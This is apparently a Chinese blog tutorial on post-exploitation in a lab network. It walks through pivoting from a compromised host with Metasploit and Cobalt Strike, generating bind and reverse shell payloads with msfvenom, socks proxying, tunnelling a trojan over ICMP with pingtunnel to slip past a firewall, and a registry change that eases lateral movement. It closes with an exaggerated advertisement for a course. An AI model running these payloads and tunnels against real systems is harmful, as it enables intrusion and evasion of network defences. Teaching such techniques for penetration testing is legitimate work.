大纲
一、网络情况
网络情况就是在我们对内网主机渗透时候,可能遇到的通信问题以及解决方法。
1、网络设备链接问题导致不能出网
场景(后续操作也是这个场景下的):
当拿下一台外网的A主机后,想要对于其所在的内网继续渗透时,发现其他处于内网的BCD主机不能直接出网,只能连接到同一局域网的A主机,而我们又不倾向于直接在A主机上去对BCD主机进行渗透(如果拿下一台主机就把工具等等传到被控主机上,会产生很多不必要的问题),所以需要将BCD主机的流量以A主机作为跳板机再传给我们的攻击机,也就是搭建代理。
解决方案:MSF通信以及搭建代理
1.1>首先我们已经拿到ws2012权限,需要与ws2016进行通信
1.2>添加路由,告诉MSF要达到的网段与会话的对应关系,可以手动也可以自动添加
1.2.1>手动增删查
#添加路由不写子网掩码默认为255.255.255.0
run autoroute -p #查看路由表
1.2.2>自动添加路由
run post/multi/manage/autoroute
1.3>生成正向后门上传至ws2016并运行
为什么要生成正向后门?
因为对于当前ws2016不出网的情况下,我们以ws2012作为跳板机去主动连接ws2016要更加便捷。
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f > bindshell.exe
1.4>将ws2012会话切换后台,设置监听选项并连接ws2016
后续ws2016到win10等等也是同理。
上线->添加路由->上传正向后门->连接
开启socks代理
MSF固然可以与内网主机通信,但是仅限MSF自己,如果我们想要用其他工具的话就无法通信了,所以我们还要在攻击机(192.168.245.129)上开启socks代理,再用代理工具连接。注意开启的代理端口是在MSF机器上面的,这台机器接收到流量后由MSF将流量转发给内网,所以代理软件应该填写攻击机的IP以及端口。
use auxiliary/server/socks_proxy
1.1>配置并运行代理模块
该模块运行后会自动切换至后台运行,可使用jobs相关命令查看以及删除
jobs #查看后台任务
1.2>使用代理工具转发本机流量通过MSF给内网ws2016
利用工具Proxifier
(Proxifier支持Windows,Linux使用ProxyChains)
下载地址
https://www.proxifier.com/
配置代理工具
通过代理访问ws2016web服务
通过代理,使得不在内网主机访问到了不出网主机的web服务。
解决方案:CS操作
CS同样,也是先拿下了ws2012。
1.1>设置监听器
Payload选择Beacon Tcp,并设置待会要连接的端口
1.2>生成后门
1.3>运行后门开启监听并输入命令进行主动连接
//CS不需要配置路由
选择ws2012会话的命令行输入
connect 目标主机ip 端口
成功上线
其他的大致相同,用正向生成运行,但是要在相邻会话连接,比如ws2012连接ws2016就在ws2012会话输入connect ws2016IP Port,ws2016连接win10那就在ws2016的会话输入connect win10IP Port
CS开启socks代理
右键会话->代理转发->socks代理
配置端口和版本
代理连接同MSF,直接用代理工具连接即可
2、防火墙等网络协议限制导致不能出网
其实这个防火墙限制绕过和waf绕过之类的差不多,如果防火墙入站严格,那就反向上线,出站严格就正向上线,如果有协议限制,那就搭建隧道替换协议上线。
场景:
木马所用TCP协议被防火墙等配置所阻止,导致木马无法与攻击机进行通信
目标机器:Win10 192.168.245.130
攻击机:Kali 192.168.245.129
Win10防火墙设置禁止tcp出站,可以ping百度但无法访问(ping命令基于 icmp,而http是基于tcp的),此时木马是无法直接上线的。
防火墙设置
解决方案:隧道工具搭建
将数据传输所用的协议转换为没有被封禁的协议(例如本次的ICMP协议),再从目标机器出来发送给攻击机,也就是隧道技术。
大概流程图:
https://github.com/esrrhs/pingtunnel
该工具为CS架构,需要在攻击机与目标机器上都进行部署,将客户端流量转发给服务端
MSF操作
1.1>生成木马并上传至目标机器
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > shell.exe
注意LHOST=127.0.0.1 LPORT=3333设置的地址是让木马在目标机器上先走隧道工具所监听的端口,而非直接出机器被防火墙拦下
1.2>设置监听
use exploit/multi/handler
y
1.3>启动pingtunnel客户端以及服务端
服务器端(攻击机)
./pingtunnel -type server -nolog 1
-noprint等命令是可选的,不使用的话可以看到一些连接时的信息
1.4>客户端执行命令(目标机器)
pingtunnel.exe -type client -l 127.0.0.1:端口 -s 服务器ip -t 服务器ip:端口 -tcp 1 -noprint 1 -nolog
1.5>运行目标机器上的木马,直接上线
CS操作
1.1>生成两个监听器,分别为127.0.0.1和攻击机ip
127.0.0.1用于生成木马,以便于木马在目标机器执行时流量先走目标机器本地的隧道工具来转换一下协议,而不是直接出站被防火墙拦下
攻击机ip则用来接受隧道工具转换后的tcp协议
1.2>使用127.0.0.1生成木马并上传
1.3>同MSF,两台主机均开启pingtunnel
1.4>直接执行木马,上线
二、权限问题
一般情况下横向移动,是可以用域管理员组内用户(Domain Admins组)、域内普通用户加入本地管理员组(Administrators组)、以及仅本地的Administrator用户(不包括Administrators组内其他本地成员)来进行的,而仅本地的管理员组是不可以的,而其原因则是UAC远程限制。
参考官方文章,修改注册表,即可使仅本地Administrators组内用户可以进行横向移动。
https://learn.microsoft.com/zh-cn/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction
值为0时(默认)
值为1时
而本地Administrator默认可以横向移动则是因为该设置
启用时,无法执行命令
禁用时(默认),可以执行命令。
题外话
网络安全作为数字时代的核心技术基石,已成为国家与企业发展的战略优先级。构建完整的安全能力体系,需从基础理论到实战对抗层层深化。以下为核心学习资源汇总:
- 网络安全完整学习路线图(覆盖全领域知识点);
- 20份渗透测试专业电子书;
- 357页安全攻防实战笔记;
- 50份安全攻防面试指南(含头部企业真题);
- 安全红队渗透工具包;
- 网络安全必读书籍清单;
- 100个漏洞实战案例解析;
- 安全大厂内部培训视频资源;
- 历年CTF夺旗赛题深度解析。
ps:网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
扫一扫
9万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
